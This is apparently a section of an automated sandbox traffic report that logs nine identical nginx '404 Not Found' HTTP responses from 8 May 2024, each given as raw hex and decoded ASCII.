                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:20 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:29 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:50 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:53 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
